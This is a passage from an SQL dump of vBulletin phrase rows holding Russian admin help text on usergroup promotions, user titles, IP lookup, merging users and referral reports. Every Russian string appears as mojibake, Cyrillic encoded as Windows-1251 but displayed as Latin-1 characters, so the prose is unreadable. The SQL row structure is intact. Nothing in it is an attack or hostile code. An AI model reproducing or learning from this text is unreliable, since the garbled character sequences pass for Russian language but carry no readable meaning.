óäàëåíèÿ. Ãòà îïåðàöèÿ íåîáðàòèìà.', 'vbulletin', '', 0, ''), (24825, -1, 'usergroup_removeleader_title', 'cphelptext', 'Óäàëåíèå ëèäåðà ãðóïïû ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24826, -1, 'usergroup_removepromotion_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå óäàëåíèÿ óêàçàííîãî ïîâûøåíèÿ. Ãàæìèòå \"Äà\" äëÿ óäàëåíèÿ. Ãòà îïåðàöèÿ íåîáðàòèìà.', 'vbulletin', '', 0, ''), (24827, -1, 'usergroup_removepromotion_title', 'cphelptext', 'Óäàëåíèå ïîâûøåíèÿ', 'vbulletin', '', 0, ''), (24828, -1, 'usergroup_updatepromotion_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì äîáàâëÿòü è ðåäàêòèðîâàòü ïîâûøåíèå. Çàïîëíèòå èëè îòðåäàêòèðóéòå íèæåðàñïîëîæåííûå ïîëÿ è íàæìèòå êíîïêó \"Ñîõðàíèòü\". Ñìîòðèòå ñïðàâêó íèæå äëÿ ïîëó÷åíèÿ èíôîðìàöèè î êàæäîé èç îïöèé.', 'vbulletin', '', 0, ''), (24829, -1, 'usergroup_updatepromotion_title', 'cphelptext', 'Äîáàâëåíèå/ðåäàêòèðîâàíèå ïîâûøåíèÿ', 'vbulletin', '', 0, ''), (24830, -1, 'usergroup_updatepromotion_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâàòåëåé, â êîòîðîé áóäåò äåéñòâîâàòü ýòî ïîâûøåíèå. Ãîëüçîâàòåëü äîëæåí áûòü ÷ëåíîì ýòîé ãðóïïû, ÷òîáû åãî êàñàëîñü ýòî ïîâûøåíèå.', 'vbulletin', '', 0, ''), (24831, -1, 'usergroup_updatepromotion_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24832, -1, 'usergroup_updatepromotion_reputationtype_text', 'cphelptext', 'Ãòî îïåðàòîð ñðàâíåíèÿ, êîòîðûé èñïîëüçóåòñÿ äëÿ çíà÷åíèé ðåïóòàöèè, ââåä¸ííûõ âûøå.
\r\n
Ãàïðèìåð, åñëè âû õîòèòå, ÷òîáû ïîâûøåíèå áàçèðîâàëîñü íà óðîâíå ðåïóòàöèè, âàì òðåáóåòñÿ óêàçàòü óðîâåíü ðåïóòàöèè â ïîëå âûøå è óñòàíîâèòü îïåðàòîð ñðàâíåíèÿ â \"Ãîëüøå èëè ðàâíî\". Òîãäà, ïîñëå äîñòèæåíèÿ ïîëüçîâàòåëåì óêàçàííîãî óðîâíÿ ðåïóòàöèè, îí áóäåò ïîâûøåí. Ñ äðóãîé ñòîðîíû, åñëè âû õîòèòå, ÷òîáû ïîíèæåíèå áàçèðîâàëîñü íà óðîâíå ðåïóòàöèè, âàì òðåáóåòñÿ óñòàíîâèòü íèçêèé óðîâåíü ðåïóòàöèè â ïîëå âûøå è óñòàíîâèòü îïåðàòîð ñðàâíåíèÿ â \"Ìåíüøå\". Òîãäà, ïîñëå ïîíèæåíèÿ óðîâíÿ ðåïóòàöèè ïîëüçîâàòåëÿ íèæå óêàçàííîãî óðîâíÿ, îí áóäåò ïîíèæåí.\r\n\r\nÃòî íå ïðèìåíèìî ê êîëè÷åñòâó ñîîáùåíèé.', 'vbulletin', 'zCarot', 1199738264, '3.7.0 Beta 4'), (24833, -1, 'usergroup_updatepromotion_reputationtype_title', 'cphelptext', 'Ñïîñîá ñðàâíåíèÿ', 'vbulletin', '', 0, ''), (24834, -1, 'usergroup_updatepromotion_reputation_text', 'cphelptext', 'Ãòî óðîâåíü ðåïóòàöèè ïîëüçîâàòåëÿ, êîòîðûé îïðåäåëÿåò, äîëæåí ëè ïîëüçîâàòåëü áûòü ïîâûøåí.
\r\n
Åñëè óðîâåíü ðåïóòàöèè ïîëüçîâàòåëÿ áîëüøå èëè ðàâåí ëèáî ìåíüøå (â çàâèñèìîñòè îò ïðåäûäóùåé îïöèè) ýòîãî ÷èñëà, ïîëüçîâàòåëü áóäåò ïîâûøåí. Ãòî çíà÷åíèå áóäåò èñïîëüçîâàíî, åñëè ðåïóòàöèÿ âêëþ÷åíà â ñòðàòåãèþ ïîâûøåíèÿ íèæå.', 'vbulletin', '', 0, ''), (24835, -1, 'usergroup_updatepromotion_reputation_title', 'cphelptext', 'Óðîâåíü ðåïóòàöèè', 'vbulletin', '', 0, ''), (24836, -1, 'usergroup_updatepromotion_date_text', 'cphelptext', 'Ãòî ÷èñëî äíåé, ïðîøåäøèõ ñ ìîìåíòà ðåãèñòðàöèè ïîëüçîâàòåëÿ, êîòîðîå îïðåäåëÿåò äîëæåí ëè ïîëüçîâàòåëü áûòü ïîâûøåí.
\r\nÃòî çíà÷åíèå áóäåò èñïîëüçîâàíî òîëüêî åñëè \"Äàòà\" âêëþ÷åíà â ñòðàòåãèþ ïîâûøåíèÿ.', 'vbulletin', 'zCarot', 1199985280, '3.7.0 Beta 4'), (24837, -1, 'usergroup_updatepromotion_date_title', 'cphelptext', 'Çàðåãèñòðèðîâàí äíåé íàçàä', 'vbulletin', '', 0, ''), (24838, -1, 'usergroup_updatepromotion_posts_text', 'cphelptext', 'Ãòî ÷èñëî îïóáëèêîâàííûõ ñîîáùåíèé, êîòîðîå îïðåäåëÿåò, äîëæåí ëè ïîëüçîâàòåëü áûòü ïîâûøåí.
\r\nÃòî çíà÷åíèå áóäåò èñïîëüçîâàíî òîëüêî åñëè \"Ñîîáùåíèÿ\" âêëþ÷åíû â ñòðàòåãèþ ïîâûøåíèÿ.', 'vbulletin', 'zCarot', 1199985268, '3.7.0 Beta 4'), (24839, -1, 'usergroup_updatepromotion_posts_title', 'cphelptext', 'Ñîîáùåíèÿ', 'vbulletin', '', 0, ''), (24840, -1, 'usergroup_updatepromotion_strategy_text', 'cphelptext', 'Âûáåðèòå, êàêèå èç âûøåðàñïîëîæåííûõ óñëîâèé äîëæíû âûïîëíÿòüñÿ äëÿ ïîâûøåíèÿ. Óñëîâèÿ â ñêîáêàõ äîëæíû âûïîëíÿòüñÿ ïåðâûìè.
\r\n
Ãàïðèìåð, åñëè âàøè íàñòðîéêè òàêîâû:
\r\n
\r\nÑïîñîá ñðàâíåíèÿ ðåïóòàöèé = \"Ãîëüøå èëè ðàâíî\"
\r\nÓðîâåíü ðåïóòàöèè = 1000
\r\nÇàðåãèñòðèðîâàí äíåé íàçàä = 30
\r\nÑîîáùåíèÿ = 100
\r\nÑòðàòåãèÿ ïîâûøåíèÿ = \"ñîîáùåíèÿ È (ðåïóòàöèÿ ÈËÈ äàòà)\"
\r\n
Åñëè ðåïóòàöèÿ ïîëüçîâàòåëÿ 1100, îí çàðåãèñòðèðîâàí 20 äíåé è èìååò 150 ñîîáùåíèé, òî îí ìîæåò áûòü ïîâûøåí ïîòîìó ÷òî:

\r\nÑîîáùåíèé: 150 >= 100 (âûïîëíÿåòñÿ)
\r\nÃåïóòàöèÿ: 1100 >= 1000 (âûïîëíÿåòñÿ)
\r\nÄàòà: 20 >= 30 (íå âûïîëíÿåòñÿ)
\r\n
... ñ èñïîëüçîâàíèåì ñòðàòåãèè ïîâûøåíèÿ \'ñîîáùåíèÿ È (ðåïóòàöèÿ ÈËÈ äàòà)\' èìååì:

\r\n_âûïîëíÿåòñÿ_ È (_âûïîëíÿåòñÿ_ ÈËÈ _íå_âûïîëíÿåòñÿ_)
\r\n= _âûïîëíÿåòñÿ_ È (_âûïîëíÿåòñÿ_)
\r\n= _âûïîëíÿåòñÿ_', 'vbulletin', '', 0, ''), (24841, -1, 'usergroup_updatepromotion_strategy_title', 'cphelptext', 'Ñòðàòåãèÿ ïîâûøåíèÿ', 'vbulletin', '', 0, ''), (24842, -1, 'usergroup_updatepromotion_type_text', 'cphelptext', 'Êàêîé ñïîñîá ïîâûøåíèÿ âûáðàòü çàâèñèò îò òîãî, êàê âû ñêîíôèãóðèðîâàëè âàøè ãðóïïû è ïðàâà äîñòóïà. Âîîáùå, åñëè ïîâûøåíèå âëå÷¸ò çà ñîáîé òîëüêî íåçíà÷èòåëüíûå èçìåíåíèÿ ïðàâ è ðàçðåøåíèé, ïðîùå ñîçäàòü íîâóþ ãðóïïó, êîòîðàÿ ïðåäîñòàâèò íîâûå ïðàâà è ðàçðåøåíèÿ, è çàòåì äîáàâèòü ïîâûøåíèå äî ÷ëåíñòâà â ýòîé ãðóïïå êàê â äîïîëíèòåëüíîé. Åñëè ïîâûøåíèå âëå÷¸ò çà ñîáîé ìíîæåñòâî èçìåíåíèé, òî, âîçìîæíî, èìååò ñìûñë â ðåçóëüòàòå ïîâûøåíèÿ èçìåíÿòü îñíîâíóþ ãðóïïó.', 'vbulletin', '', 0, ''), (24843, -1, 'usergroup_updatepromotion_type_title', 'cphelptext', 'Ñïîñîá ïîâûøåíèÿ', 'vbulletin', '', 0, ''), (24844, -1, 'usergroup_updatepromotion_joinusergroupid_text', 'cphelptext', 'Åñëè ïîëüçîâàòåëü óäîâëåòâîðèò êðèòåðèÿì ýòîãî ïîâûøåíèÿ, îí ñòàíåò ÷ëåíîì ýòîé ãðóïïû. Ãóäåò ëè îñíîâíàÿ ïîëüçîâàòåëüñêàÿ ãðóïïà ñìåíåíà, èëè ïîëüçîâàòåëþ áóäåò äîáàâëåíî ÷ëåíñòâî â äîïîëíèòåëüíîé ãðóïïå, çàâèñèò îò îïöèè \"Ñïîñîá ïîâûøåíèÿ\" âûøå.', 'vbulletin', '', 0, ''), (24845, -1, 'usergroup_updatepromotion_joinusergroupid_title', 'cphelptext', 'Ãåðåìåñòèòü â ãðóïïó', 'vbulletin', '', 0, ''), (24846, -1, 'usergroup_viewjoinrequests_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò ïîäòâåðæäàòü çàÿâêè íà âñòóïëåíèå â âàøè äîïîëíèòåëüíûå ãðóïïû. Âûáåðèòå ãðóïïó èç ìåíþ íàâåðõó, ÷òîáû ïðîñìîòðåòü çàÿâêè íà âñòóïëåíèå â íå¸. Äàëåå âûáåðèòå äåéñòâèå äëÿ çàÿâêè íà âñòóïëåíèå (ïðèíÿòü, îòêëîíèòü èëè èãíîðèðîâàòü).
\r\n
Ãðèíÿòèå çàÿâêè ñíèìàåò çàïðîñ èç î÷åðåäè íà ïðîâåðêè è äîáàâëÿåò ïîëüçîâàòåëÿ ê âûáðàííîé ãðóïïå. Îòêëîíåíèå çàÿâêè òàêæå ñíèìàåò å¸, îäíàêî ïîëüçîâàòåëü íå äîáàâëÿåòñÿ ê ãðóïïå. Èãíîðèðîâàíèå çàÿâêè îñòàâëÿåò å¸ â î÷åðåäè íà ïðîâåðêó, ÷òîáû âû ìîãëè îáðàáîòàòü å¸ â äðóãîå âðåìÿ.
\r\n
Åñëè âû õîòèòå ïðèíÿòü, îòêëîíèòü èëè èãíîðèðîâàòü âñå çàïðîñû íà ïðèñîåäèíåíèå, âû ìîæåòå íàæàòü ïîäõîäÿùóþ êíîïêó íàâåðõó, êîòîðàÿ ñîîòâåòñòâóþùèì îáðàçîì óñòàíàâëèâàåò âñå äåéñòâèÿ.
\r\n
Ëèäåðû ãðóïï ìîãóò òàêæå ïðîâåðÿòü ýòè çàÿâêè íà ñòðàíèöå ×ëåíñòâî â ãðóïïàõ â ñâî¸ì êàáèíåòå.', 'vbulletin', '', 0, ''), (24847, -1, 'usergroup_viewjoinrequests_title', 'cphelptext', 'Çàÿâêè íà âñòóïëåíèå', 'vbulletin', '', 0, ''), (24848, -1, 'usertitle_text', 'cphelptext', 'Ñòàòóñû ïîëüçîâàòåëåé:\r\n
Ñòàòóñû - ýòî ïîêàçàòåëü ñòàòóñà ïîëüçîâàòåëÿ íà ôîðóìå, îíè îòîáðàæàþòñÿ íèæå èìåí â ñîîáùåíèÿõ. Âû ìîæåòå èñïîëüçîâàòü óïðàâëåíèå ñòàòóñàìè ïîëüçîâàòåëåé, ÷òîáû ñîçäàòü ñèñòåìó ñòàòóñîâ ïîëüçîâàòåëåé, îñíîâûâàÿñü íà êîëè÷åñòâå îïóáëèêîâàííûõ ñîîáùåíèÿõ.
\r\n
Ó÷òèòå, ÷òî åñëè â ãðóïïå ïîëüçîâàòåëÿ óêàçàí \"Ñòàòóñ ïîëüçîâàòåëÿ\" (ñì. Óïðàâëåíèå ãðóïïàìè ïîëüçîâàòåëåé), ïîëüçîâàòåëþ áóäåí ïðèñâîåí ñòàòóñ ãðóïïû âìåñòî îäíîãî èç îïðåäåë¸ííûõ â óïðàâëåíèè ñòàòóñàìè ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24849, -1, 'usertitle_title', 'cphelptext', 'ÃŽ ñòàòóñàõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24850, -1, 'usertitle_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáàâèòü íîâûé ñòàòóñ ïîëüçîâàòåëÿ, ïðèñâàèâàåìûé íà îñíîâàíèè êîëè÷åñòâà îïóáëèêîâàííûõ ñîîáùåíèé. Êîãäà ïîëüçîâàòåëü äîñòèãíåò óêàçàííîãî êîëè÷åñòâà îïóáëèêîâàííûõ ñîîáùåíèé, åãî ñòàòóñ áóäåò ñìåí¸í.', 'vbulletin', '', 0, ''), (24851, -1, 'usertitle_add_title', 'cphelptext', 'Äîáàâèòü íîâûé ñòàòóñ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24852, -1, 'usertitle_add_edit_title_text', 'cphelptext', 'Ãòî ñòàòóñ áóäåò ïðèñâîåí ïîëüçîâàòåëÿì, îïóáëèêîâàâøèì ÷èñëî ñîîáùåíèé, óêàçàííîå íèæå.', 'vbulletin', '', 0, ''), (24853, -1, 'usertitle_add_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (24854, -1, 'usertitle_add_edit_minposts_text', 'cphelptext', 'Ãòî ìèíèìàëüíîå êîëè÷åñòâî ñîîáùåíèé, êîòîðîå íåîáõîäèìî îïóáëèêîâàòü ïîëüçîâàòåëþ, ÷òîáû ïîëó÷èòü óêàçàííûé âûøå ñòàòóñ. Êîãäà ïîëüçîâàòåëü îïóáëèêóåò ýòî êîëè÷åñòâî ñîîáùåíèé, åãî ñòàòóñ áóäåò ñìåí¸í íà óêàçàííûé âûøå.', 'vbulletin', '', 0, ''), (24855, -1, 'usertitle_add_edit_minposts_title', 'cphelptext', 'Ìèíèìàëüíîå ÷èñëî ñîîáùåíèé', 'vbulletin', '', 0, ''), (24856, -1, 'usertitle_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäàêòèðîâàòü ñóùåñòâóþùèé ñòàòóñ ïîëüçîâàòåëÿ. Êîãäà ïîëüçîâàòåëü îïóáëèêóåò óêàçàííîå êîëè÷åñòâî ñîîáùåíèé, åãî ñòàòóñ áóäåò ñìåí¸í.', 'vbulletin', '', 0, ''), (24857, -1, 'usertitle_edit_title', 'cphelptext', 'ÃŽ ïîëüçîâàòåëÿõ', 'vbulletin', '', 0, ''), (24858, -1, 'usertitle_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óêàçàòü çàâèñèìîñòü ñòàòóñîâ ïîëüçîâàòåëåé îò êîëè÷åñòâà îïóáëèêîâàííûõ èìè ñîîáùåíèé. Êîãäà ïîëüçîâàòåëü îïóáëèêóåò óêàçàííîå êîëè÷åñòâî ñîîáùåíèé, åãî ñòàòóñ áóäåò èçìåí¸í. Ñòàòóñû ïîëüçîâàòåëåé îòîáðàæàþòñÿ â ïðîôèëÿõ è ñîîáùåíèÿõ.
\r\n
Ãàæìèòå êíîïêó \"Äîáàâèòü íîâûé ñòàòóñ ïîëüçîâàòåëÿ\", ÷òîáû ñîçäàòü íîâûé ñòàòóñ ïîëüçîâàòåëÿ. Ãèæå íàõîäèòñÿ ñïèñîê ñóùåñòâóþùèõ ñòàòóñîâ ïîëüçîâàòåëåé. Ñïðàâà îò êàæäîãî ñòàòóñà íàõîäèòñÿ ìåíþ ñ îïöèÿìè \"Èçìåíèòü\" è \"Óäàëèòü\" äëÿ, ñîîòâåòñòâåííî, ðåäàêòèðîâàíèÿ ñòàòóñà è ìèíèìàëüíîãî êîëè÷åñòâà ñîîáùåíèé, íåîáõîäèìîãî äëÿ ïîëó÷åíèÿ ýòîãî ñòàòóñà, è äëÿ óäàëåíèÿ ñòàòóñà.', 'vbulletin', '', 0, ''), (24859, -1, 'usertitle_modify_title', 'cphelptext', 'Óïðàâëåíèå ñòàòóñàìè', 'vbulletin', '', 0, ''), (24860, -1, 'usertitle_remove_text', 'cphelptext', 'Ãîäòâåðäèòå óäàëåíèå ýòîãî ñòàòóñà. Ãàæìèòå êíîïêó \"Äà\" äëÿ óäàëåíèÿ. Ãòà îïåðàöèÿ íåîáðàòèìà.', 'vbulletin', '', 0, ''), (24861, -1, 'usertitle_remove_title', 'cphelptext', 'Óäàëåíèå ñòàòóñà', 'vbulletin', '', 0, ''), (24862, -1, 'usertools_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃîëüçîâàòåëè
\r\nÓïðàâëåíèå ïîëüçîâàòåëÿìè
\r\nÃëîêèðîâêà ïîëüçîâàòåëÿ
\r\nÃàññûëêà ýëåêòðîííûõ ïèñåì
\r\nÌàñêè äîñòóïà

\r\nÓïðàâëåíèå ïîëüçîâàòåëÿìè:\r\n
Ñåêöèÿ óïðàâëåíèÿ ïîëüçîâàòåëÿìè ïàíåëè àäìèíèñòðàòîðà ïîçâîëÿåò âàì îáúåäèíÿòü ïîëüçîâàòåëåé, ïðîñìàòðèâàòü è óïðàâëÿòü èõ ëè÷íûìè ñîîáùåíèÿìè, ïðîñìàòðèâàòü ðåôåððàëüíóþ èíôîðìàöèþ è èñêàòü ïîëüçîâàòåëüñêèå IP àäðåñà.
\r\n
Âîçìîæíîñòü îáúåäèíåíèÿ ïîëüçîâàòåëåé ìîæåò áûòü î÷åíü ïîëåçíà, êîãäà èìååøü äåëî ñ ïîëüçîâàòåëÿìè, ó êîòîðûõ íåñêîëüêî àêêàóíòîâ. Îïöèÿ \"Îáúåäèíåíèå ïîëüçîâàòåëåé\" ïåðåçàïèñûâàåò àâòîðà âñåõ ïîëüçîâàòåëüñêèå ñîîáùåíèÿ, ËÑ è ò.ä. äëÿ êàæäîãî àêêàóíòà.
\r\n
Âû ìîæåòå ïðîñìîòðåòü ñòàòèñòèêó ËÑ âàøåãî ôîðóìà. Ãòà îïöèÿ ïîçâîëÿåò âàì ïðîñìàòðèâàòü ñòàòèñòèêó õðàíÿùèõñÿ â ïàïêàõ ïîëüçîâàòåëåé ËÑ. Âû òàêæå ìîæåòå óäàëÿòü ëè÷íûå ñîîáùåíèÿ ïîëüçîâàòåëåé.
\r\n
Åñëè ó âàñ â îñíîâíûõ íàñòðîéêàõ âêëþ÷åíû ðåôåððàëû, òî ïîëüçîâàòåëè ìîãóò ïðèãëàøàòü íîâûõ ëþäåé íà âàø ôîðóì, èñïîëüçóÿ ñâîé ðåôåððàëüíûé èäåíòèôèêàòîð, ÷òîáû ïîëó÷èòü î÷êè ðåôåððåíãà. Âû ìîæåòå çàïðîñèòü îò÷¸ò, îòîáðàæàþùèé ðåôåððàëû âàøåãî ôîðóìà íà ñòðàíèöå Ãåôåððàëû. Ãòà ôóíêöèÿ ïðåäîñòàâèò èíôîðìàöèþ î òîì, êàêèå ïîëüçîâàòåëè ïðèãëàøàþò íîâûõ ëþäåé íà âàø ôîðóì.
\r\n
Ãàêîíåö, âû ìîæåòå èñêàòü ïîëüçîâàòåëåé ïî IP àäðåñó èëè èñêàòü IP àäðåñà ïî èìåíè ïîëüçîâàòåëÿ â ñåêöèè Ãîèñê ïî IP àäðåñó. Äâèæîê ôîðóìà çàïèñûâàåò IP àäðåñà ïîëüçîâàòåëåé, êîòîðûå ïîñåùàþò âàø ôîðóì. Ãåêîòîðûå èíòåðíåò ïðîâàéäåðû ïðèñâàèâàþò íîâûé IP àäðåñ êàæäûé ðàç ïðè ñîåäèíåíèè, â òî âðåìÿ êàê äðóãèå ïðèñâàèâàþò òîëüêî îäèí IP àäðåñ. Ãîëüçîâàòåëè ñ äèíàìè÷åñêèìè IP ìîãóò áûòü áîëåå íåóëîâèìûìè ÷åì òå, ó êîãî ñòàòè÷åñêèé IP; òåì íå ìåíåå, IP àäðåñà ìîãóò áûòü èñïîëüçîâàíû äëÿ èäåíòèôèêàöèè ïîëüçîâàòåëåé.\r\nÂîçìîæíûì ïðèìåíåíèåì ïîèñêà IP àäðåñîâ ìîæåò áûòü èäåíòèôèêàöèÿ äðóãèõ àêêàóíòîâ îäíîãî è òîãî æå ÷åëîâåêà è áëîêèðîâêà IP ïðîáëåìíûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24863, -1, 'usertools_title', 'cphelptext', 'Îá óïðàâëåíèè ïîëüçîâàòåëÿìè', 'vbulletin', '', 0, ''), (24864, -1, 'usertools_doips_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîñìîòðåòü ñîîòâåòñòâèÿ èìåíè ïîëüçîâàòåëÿ è åãî IP àäðåñîâ, è íàîáîðîò, IP àäðåñà è ïîëüçîâàòåëåé, êîòîðûå åãî èñïîëüçîâàëè.', 'vbulletin', '', 0, ''), (24865, -1, 'usertools_doips_title', 'cphelptext', 'Ãîèñê ïî IP àäðåñó', 'vbulletin', '', 0, ''), (24866, -1, 'usertools_doips_ipaddress_text', 'cphelptext', 'Ââåäèòå ñþäà IP àäðåñ, ïî êîòîðîìó æåëàåòå íàéòè ïîëüçîâàòåëåé. Âû ìîæåòå ââåñòè êàê ïîëíûé IP (íàïðèìåð, 123.222.244.211), òàê è ÷àñòè÷íûé (íàïðèìåð, 123, èëè 123.222, èëè 123.222.244, èëè 123.222.2).

Ãîìíèòå: åñëè ó âàñ î÷åíü ìíîãî ñîîáùåíèé, òî ýòîò ïðîöåññ ìîæåò çàíÿòü ïðîäîëæèòåëüíîå âðåìÿ.', 'vbulletin', 'zCarot', 1199736645, '3.7.0 Beta 4'), (24867, -1, 'usertools_doips_ipaddress_title', 'cphelptext', 'Ãàéòè ïîëüçîâàòåëåé ïî IP àäðåñó', 'vbulletin', '', 0, ''), (24868, -1, 'usertools_doips_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ, ÷òîáû íàéòè âñå èñïîëüçóåìûå èì IP àäðåñà.', 'vbulletin', '', 0, ''), (24869, -1, 'usertools_doips_username_title', 'cphelptext', 'Ãàéòè IP àäðåñà ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24870, -1, 'usertools_doips_depth_text', 'cphelptext', 'Ãðè ãëóáèíå ïîèñêà 1, âàì áóäóò îòîáðàæåíû ëèøü ðåçóëüòàòû ïîèñêà. Ãðè ãëóáèíå 2 âû ïîëó÷èòå ðåçóëüòàòû ïîèñêà â òàêîì âèäå, êàê áóäòî äëÿ êàæäîãî ïîëó÷åííîãî ðåçóëüòàòà âû ïðîâåëè áû îòäåëüíûé ïîèñê.\r\n

Ãàïðèìåð:

\r\nÈùåì ïîëüçîâàòåëåé ñ IP 127.0.0.1 è ãëóáèíîé ïîèñêà 1: ðåçóëüòàòû \"àäìèí\" è \"zÌàðêîâêà\". Ãðè ïîèñêå ïî IP 127.0.0.1 è ãëóáèíîé 2 ìû ïîëó÷èì: \"àäìèí\" è \"zÌàðêîâü\", à òàêæå âñå IP àäðåñà, ïîä êîòîðûìè çàõîäèëè ïîëüçîâàòåëè \"àäìèí\" è \"zÌàðêîâêà\".', 'vbulletin', '', 0, ''), (24871, -1, 'usertools_doips_depth_title', 'cphelptext', 'Ãëóáèíà ïîèñêà', 'vbulletin', '', 0, ''), (24872, -1, 'usertools_domerge_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîäòâåðæäåíèÿ îáúåäèíåíèÿ äâóõ óêàçàííûõ ïîëüçîâàòåëåé. Ãîæàëóéñòà, ïðîâåðüòå ïðàâèëüíîñòü îòîáðàæåííîé íèæå èíôîðìàöèè è íàæìèòå êíîïêó \"Äà\" äëÿ ïîäòâåðæäåíèÿ.', 'vbulletin', '', 0, ''), (24873, -1, 'usertools_domerge_title', 'cphelptext', 'Ãîäòâåðæäåíèå ñëèÿíèÿ', 'vbulletin', '', 0, ''), (24874, -1, 'usertools_gethost_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïðîñìîòðåòü èìÿ õîñòà ýòîãî IP àäðåñà.', 'vbulletin', '', 0, ''), (24875, -1, 'usertools_gethost_title', 'cphelptext', 'Ãîêàçàòü õîñò', 'vbulletin', '', 0, ''), (24876, -1, 'usertools_merge_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñäåëàòü èç äâóõ ïîëüçîâàòåëåé îäíîãî. Ãðèìåíÿåòñÿ äëÿ ñëèÿíèÿ ñîîáùåíèé, òåì è ò.ä. ïîëüçîâàòåëåé, èìåþùèõ íåñêîëüêî àêêàóíòîâ.', 'vbulletin', '', 0, ''), (24877, -1, 'usertools_merge_title', 'cphelptext', 'Îáúåäèíåíèå ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24878, -1, 'usertools_merge_sourceuser_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ-èñòî÷íèêà. Ñîîáùåíèÿ ýòîãî ïîëüçîâàòåëÿ, òåìû, êàëåíäàðíûå ñîáûòèÿ, ëè÷íûå ñîîáùåíèÿ, îïóáëèêîâàííûå ñîîáùåíèÿ, ðåïóòàöèÿ, ñïèñêè çíàêîìûõ, äðóçåé è èãíîðèðîâàíèÿ áóäóò äîïèñàíû ê àêêàóíòó ïîëüçîâàòåëÿ-ïîëó÷àòåëÿ. Ãðàâà äîñòóïà ïîëüçîâàòåëÿ-èñòî÷íèêà áóäóò ïåðåìåùåíû â ïîëüçó ïîëüçîâàòåëÿ-ïîëó÷àòåëÿ.', 'vbulletin', 'zCarot', 1196775418, '3.7.0 Beta 1'), (24879, -1, 'usertools_merge_sourceuser_title', 'cphelptext', 'Èìÿ ïîëüçîâàòåëÿ-èñòî÷íèêà', 'vbulletin', '', 0, ''), (24880, -1, 'usertools_merge_destuser_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ, êîòîðûé îñòàíåòñÿ ïîñëå îáúåäèíåíèÿ. Ãòîò ïîëüçîâàòåëü óíàñëåäóåò îïóáëèêîâàííûå ñîîáùåíèÿ, òåìû, ñîáûòèÿ êàëåíäàðÿ, ëè÷íûå ñîîáùåíèÿ, êîëè÷åñòâî ñîîáùåíèé, ðåïóòàöèþ, ñïèñêè çíàêîìûõ, äðóçåé è èãíîðèðîâàíèÿ ïîëüçîâàòåëÿ-èñòî÷íèêà. Ãðàâà äîñòóïà ðåçóëüòèðóþùåãî ïîëüçîâàòåëÿ îñòàíóòñÿ òåìè æå.', 'vbulletin', 'zCarot', 1196775402, '3.7.0 Beta 1'), (24881, -1, 'usertools_merge_destuser_title', 'cphelptext', 'Ãîëüçîâàòåëü-ïîëó÷àòåëü', 'vbulletin', '', 0, ''), (24882, -1, 'usertools_pmfolderstats_text', 'cphelptext', 'Ãòî îò÷¸ò, îòîáðàæàþùèé ïàïêè ËÑ ýòîãî ïîëüçîâàòåëÿ è ÷èñëî ËÑ â êàæäîé ïàïêå.', 'vbulletin', '', 0, ''), (24883, -1, 'usertools_pmfolderstats_title', 'cphelptext', 'Ñòàòèñòèêà ëè÷íûõ ñîîáùåíèé', 'vbulletin', '', 0, ''), (24884, -1, 'usertools_pmstats_text', 'cphelptext', 'Çäåñü âû ìîæåòå èñêàòü ïîëüçîâàòåëåé, èìåþùèõ X ëè÷íûõ ñîîáùåíèé.', 'vbulletin', '', 0, ''), (24885, -1, 'usertools_pmstats_title', 'cphelptext', 'Ñòàòèñòèêà ëè÷íûõ ñîîáùåíèé', 'vbulletin', '', 0, ''), (24886, -1, 'usertools_pmuserstats_text', 'cphelptext', 'Ãòî ñïèñîê âñåõ ïîëüçîâàòåëåé, õðàíÿùèõ X ëè÷íûõ ñîîáùåíèé.', 'vbulletin', '', 0, ''), (24887, -1, 'usertools_pmuserstats_title', 'cphelptext', 'Ãîëüçîâàòåëè, õðàíÿùèå X ËÑ', 'vbulletin', '', 0, ''), (24888, -1, 'usertools_referrers_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñîçäàòü îò÷¸ò, îòîáðàæàþùèé ðåôåððàëîâ çà îïðåäåëåííûé ïåðèîä âðåìåíè.
\r\n
Ãåôåððàëüíàÿ ñèñòåìà ìîæåò áûòü íàñòðîåíà çäåñü. Ãåôåððàëû íå âîéäóò, ïîêà ñèñòåìà âûêëþ÷åíà.', 'vbulletin', '', 0, ''), (24889, -1, 'usertools_referrers_title', 'cphelptext', 'Ãåôåððàëû', 'vbulletin', '', 0, ''), (24890, -1, 'usertools_referrers_startdate_text', 'cphelptext', 'Ââåäèòå íà÷àëüíóþ äàòó äëÿ îò÷¸òà. Âûáåðèòå ìåñÿö è ââåäèòå äâóçíà÷íûé äåíü, ÷åòûðåõçíà÷íûé ãîä, äâóçíà÷íûé ÷àñ è äâóçíà÷íûå ìèíóòû. Îò÷¸ò îòîáðàçèò âñþ ðåôåððàëüíóþ èíôîðìàöèþ çà ïåðèîä ñ íà÷àëüíîé äî êîíå÷íîé äàòû.', 'vbulletin', '', 0, ''), (24891, -1, 'usertools_referrers_startdate_title', 'cphelptext', 'Ãà÷àëüíàÿ äàòà', 'vbulletin', '', 0, ''), (24892, -1, 'usertools_referrers_enddate_text', 'cphelptext', 'Ââåäèòå êîíå÷íóþ äàòó äëÿ îò÷¸òà. Âûáåðèòå ìåñÿö è ââåäèòå 